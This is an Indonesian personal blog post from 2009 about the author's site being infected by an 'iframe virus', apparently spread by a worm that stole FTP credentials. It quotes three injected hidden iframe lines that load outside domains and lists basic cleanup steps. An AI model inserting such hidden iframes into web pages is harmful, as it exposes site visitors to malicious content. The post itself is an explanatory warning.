Virus Iframe Menyebalkan
Ibarat virus menular, hanya dalam hitungan jam semua file index.php atau index.html yang ada satu hosting habis di kerjain nih virus. Efek yang ditimbulakan emang ngak terlalu parah, cuma sebel aja harus ngapusin baris code iframe yang disisipin tuh virus.
Ceritanya begini, Beberapa hari yang lalu blog katrok ini diinggapi virus iframe, aku juga baru menyadari setelah melihat kecepatan load blog ini. Merasa aneh ngak biasanya load blog ini lumayan lama. Sempat berpikir mungkin netnya emang lagi katrok atau servernya lagi kurang sehat. Ternyata setelah nurunin scroll lebih jauh mulai kelihatan penampakan si virus, mungkin yang sempat ngeliat ada iframe dibawah footer blog ini seperti gambar dibawah ini. Murni ini bukan kerjaan iseng aku, tapi kerjaannya si virus iframe.
Efeknya? Untuk jangka panjang yang mungkin ditimbulkan dari si virus, web/blog yang terinveksi akan dicap sebagai web yang berbahaya. Kalau untuk web/blog untuk mencari rejeki bisa kacau tuh, tapi kalo untuk blog personal kacau juga sih (hehehe).
Bagaimana bisa masuk kehosting kita? Ini masih mungkin ya, berdasar pengalaman yang aku alamin, salah satu penyebabnya adalah dari komputer tempat kita mengupload file-file ke server dengan menggunakan FTP Client. Nah, di OS yang kita pake ngupload itu sudah terinstall worm yang bertugas mencuri konfigurasi FTP yang kita gunakan antara lain alamat host, user name dan password.
contoh kode yang disisipkan si virus ke file index
<iframe src=”http://internetcountercheck.com/?click=12433700? width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
<iframe src=”http://xtrarobotz.com/?click=98E581? width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
<iframe src=”http://peskostruikaz.com/?click=198EA8? width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
Cara Penanganan?
- Ubah Password FTP yang digunakan
- Ubah Permisson Folder menjadi 644
- Cek kembali file – file index yang sudah dibersihkan
- Silahkan kalau ada yang mau nambahin………
Semoga bermanfaat buat yang ngalamin kasus serupa. jika ada yang ngeliat virus itu beraksi lagi diblog ini harap melapor kemarkas
This entry was posted on Wednesday, December 9th, 2009 at 11:01 pm and is filed under Curhat, Dunia It, HTML, Linux, PHP. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.














heru Reply:
December 15th, 2009 at 12:42 pm
setubuh mas
Reply